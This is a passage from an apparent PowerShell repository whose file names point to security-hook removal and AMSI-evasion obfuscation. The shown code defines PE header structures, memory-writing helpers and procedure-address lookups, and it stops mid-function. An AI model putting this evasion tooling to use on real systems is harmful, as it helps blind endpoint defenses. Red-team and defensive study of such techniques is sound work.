├── AsparuxUnHook.ps1 ├── README.md ├── asamsiobfuscate.py └── ofuscateasparuxunhook.ps1 /AsparuxUnHook.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-AsparuxUnHook 2 | { 3 | [CmdletBinding()] 4 | param( 5 | ) 6 | 7 | Set-StrictMode -Version 2 8 | 9 | Function Get-Win32Types 10 | { 11 | #Define all the structures/enums that will be used 12 | $Win32Types = New-Object System.Object 13 | $Domain = [AppDomain]::CurrentDomain 14 | $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') 15 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 16 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) 17 | $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] 18 | 19 | #Enum MachineType 20 | $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) 21 | $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null 22 | $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null 23 | $MagicType = $TypeBuilder.CreateType() 24 | $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType 25 | 26 | #Enum SubSystemType 27 | $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) 28 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null 29 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null 30 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null 31 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null 32 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null 33 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null 34 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null 35 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null 36 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null 37 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null 38 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null 39 | $SubSystemType = $TypeBuilder.CreateType() 40 | $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType 41 | 42 | #Enum DllCharacteristicsType 43 | $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) 44 | $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null 45 | $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null 46 | $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null 47 | $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null 48 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null 49 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null 50 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null 51 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null 52 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null 53 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null 54 | $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null 55 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null 56 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null 57 | $DllCharacteristicsType = $TypeBuilder.CreateType() 58 | $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType 59 | 60 | #Struct IMAGE_DATA_DIRECTORY 61 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 62 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) 63 | ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null 64 | ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null 65 | $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() 66 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY 67 | 68 | #Struct IMAGE_FILE_HEADER 69 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 70 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) 71 | $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null 72 | $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null 73 | $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null 74 | $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null 75 | $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null 76 | $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null 77 | $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null 78 | $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() 79 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER 80 | 81 | #Struct IMAGE_OPTIONAL_HEADER64 82 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 83 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) 84 | ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null 85 | ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null 86 | ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null 87 | ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null 88 | ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null 89 | ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null 90 | ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null 91 | ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null 92 | ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null 93 | ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null 94 | ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null 95 | ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null 96 | ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null 97 | ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null 98 | ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null 99 | ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null 100 | ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null 101 | ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null 102 | ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null 103 | ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null 104 | ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null 105 | ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null 106 | ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null 107 | ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null 108 | ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null 109 | ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null 110 | ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null 111 | ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null 112 | ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null 113 | ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null 114 | ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null 115 | ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null 116 | ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null 117 | ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null 118 | ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null 119 | ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null 120 | ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null 121 | ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null 122 | ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null 123 | ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null 124 | ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null 125 | ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null 126 | ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null 127 | ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null 128 | ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null 129 | $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() 130 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 131 | 132 | #Struct IMAGE_OPTIONAL_HEADER32 133 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 134 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) 135 | ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null 136 | ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null 137 | ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null 138 | ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null 139 | ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null 140 | ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null 141 | ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null 142 | ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null 143 | ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null 144 | ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null 145 | ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null 146 | ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null 147 | ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null 148 | ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null 149 | ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null 150 | ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null 151 | ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null 152 | ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null 153 | ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null 154 | ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null 155 | ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null 156 | ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null 157 | ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null 158 | ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null 159 | ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null 160 | ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null 161 | ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null 162 | ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null 163 | ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null 164 | ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null 165 | ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null 166 | ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null 167 | ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null 168 | ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null 169 | ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null 170 | ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null 171 | ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null 172 | ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null 173 | ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null 174 | ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null 175 | ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null 176 | ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null 177 | ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null 178 | ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null 179 | ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null 180 | ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null 181 | $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() 182 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 183 | 184 | #Struct IMAGE_NT_HEADERS64 185 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 186 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) 187 | $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null 188 | $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null 189 | $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null 190 | $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() 191 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 192 | 193 | #Struct IMAGE_NT_HEADERS32 194 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 195 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) 196 | $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null 197 | $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null 198 | $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null 199 | $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() 200 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 201 | 202 | #Struct IMAGE_DOS_HEADER 203 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 204 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) 205 | $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null 206 | $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null 207 | $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null 208 | $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null 209 | $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null 210 | $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null 211 | $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null 212 | $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null 213 | $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null 214 | $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null 215 | $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null 216 | $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null 217 | $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null 218 | $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null 219 | 220 | $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') 221 | $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray 222 | $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) 223 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) 224 | $e_resField.SetCustomAttribute($AttribBuilder) 225 | 226 | $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null 227 | $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null 228 | 229 | $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') 230 | $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray 231 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) 232 | $e_res2Field.SetCustomAttribute($AttribBuilder) 233 | 234 | $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null 235 | $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() 236 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER 237 | 238 | #Struct IMAGE_SECTION_HEADER 239 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 240 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) 241 | 242 | $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') 243 | $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray 244 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) 245 | $nameField.SetCustomAttribute($AttribBuilder) 246 | 247 | $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null 248 | $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null 249 | $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null 250 | $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null 251 | $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null 252 | $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null 253 | $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null 254 | $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null 255 | $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null 256 | $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() 257 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER 258 | 259 | return $Win32Types 260 | } 261 | 262 | Function Get-ImageNtHeaders 263 | { 264 | Param( 265 | [Parameter(Position = 0, Mandatory = $true)] 266 | [IntPtr] 267 | $PEHandle, 268 | 269 | [Parameter(Position = 1, Mandatory = $true)] 270 | [System.Object] 271 | $Win32Types 272 | ) 273 | 274 | $NtHeadersInfo = New-Object System.Object 275 | 276 | $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) 277 | 278 | #Get IMAGE_NT_HEADERS 279 | [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) 280 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr 281 | $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64) 282 | 283 | #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. 284 | if ($imageNtHeaders64.Signature -ne 0x00004550) 285 | { 286 | throw "Invalid IMAGE_NT_HEADER signature." 287 | } 288 | 289 | if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') 290 | { 291 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 292 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true 293 | } 294 | else 295 | { 296 | $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) 297 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 298 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false 299 | } 300 | 301 | return $NtHeadersInfo 302 | } 303 | 304 | Function Write-BytesToMemory 305 | { 306 | Param( 307 | [Parameter(Position=0, Mandatory = $true)] 308 | [Byte[]] 309 | $Bytes, 310 | 311 | [Parameter(Position=1, Mandatory = $true)] 312 | [IntPtr] 313 | $MemoryAddress 314 | ) 315 | 316 | for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) 317 | { 318 | [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) 319 | } 320 | } 321 | 322 | Function Add-SignedIntAsUnsigned 323 | { 324 | Param( 325 | [Parameter(Position = 0, Mandatory = $true)] 326 | [Int64] 327 | $Value1, 328 | 329 | [Parameter(Position = 1, Mandatory = $true)] 330 | [Int64] 331 | $Value2 332 | ) 333 | 334 | [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) 335 | [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) 336 | [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) 337 | 338 | if ($Value1Bytes.Count -eq $Value2Bytes.Count) 339 | { 340 | $CarryOver = 0 341 | for ($i = 0; $i -lt $Value1Bytes.Count; $i++) 342 | { 343 | [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver 344 | 345 | $FinalBytes[$i] = $Sum -band 0x00FF 346 | 347 | if (($Sum -band 0xFF00) -eq 0x100) 348 | { 349 | $CarryOver = 1 350 | } 351 | else 352 | { 353 | $CarryOver = 0 354 | } 355 | } 356 | } 357 | else 358 | { 359 | Throw "Cannot add bytearrays of different sizes" 360 | } 361 | 362 | return [BitConverter]::ToInt64($FinalBytes, 0) 363 | } 364 | 365 | #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 366 | Function Get-DelegateType 367 | { 368 | Param 369 | ( 370 | [OutputType([Type])] 371 | 372 | [Parameter( Position = 0)] 373 | [Type[]] 374 | $Parameters = (New-Object Type[](0)), 375 | 376 | [Parameter( Position = 1 )] 377 | [Type] 378 | $ReturnType = [Void] 379 | ) 380 | 381 | $Domain = [AppDomain]::CurrentDomain 382 | $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') 383 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 384 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) 385 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 386 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) 387 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') 388 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) 389 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') 390 | 391 | Write-Output $TypeBuilder.CreateType() 392 | } 393 | 394 | #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 395 | Function Get-ProcAddress 396 | { 397 | Param 398 | ( 399 | [OutputType([IntPtr])] 400 | 401 | [Parameter( Position = 0, Mandatory = $True )] 402 | [String] 403 | $Module, 404 | 405 | [Parameter( Position = 1, Mandatory = $True )] 406 | 